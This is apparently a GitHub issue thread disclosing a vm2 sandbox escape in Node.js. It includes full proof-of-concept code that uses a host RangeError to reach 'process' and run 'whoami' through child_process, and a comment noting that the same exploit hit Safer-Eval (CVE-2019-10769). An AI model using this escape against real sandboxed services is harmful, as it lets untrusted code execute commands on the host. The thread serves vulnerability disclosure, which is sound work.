It is possible to almost anywhere generate a RangeError: Maximum call stack size exceeded. Sometimes the RangeError will be a host RangeError which is not Contextified.
I tried to make the code as stable as possible.
"use strict";const{VM}=require('vm2');constuntrusted=`const f = Buffer.prototype.write;const ft = { length: 10, utf8Write(){ }}function r(i){ var x = 0; try{ x = r(i); }catch(e){} if(typeof(x)!=='number') return x; if(x!==i) return x+1; try{ f.call(ft); }catch(e){ return e; } return null;}var i=1;while(1){ try{ i=r(i).constructor.constructor("return process")(); break; }catch(x){ i++; }}i.mainModule.require("child_process").execSync("whoami").toString()`;try{console.log(newVM().run(untrusted));}catch(x){console.log(x);}
I used 11.8.0.
The text was updated successfully, but these errors were encountered:
@XmiliaH Just a heads up, your POC worked against another project as well called Safer-Eval and had the following CVE number assigned to it: CVE-2019-10769. Nice finding!
You can break out far easier commenthol/safer-eval#10. And to get a host exceptions one can just supply a invalid argument to get a exception. Using maximum call stack RangeError is overkill.
It is possible to almost anywhere generate a RangeError: Maximum call stack size exceeded. Sometimes the RangeError will be a host RangeError which is not Contextified.
I tried to make the code as stable as possible.
I used 11.8.0.
The text was updated successfully, but these errors were encountered: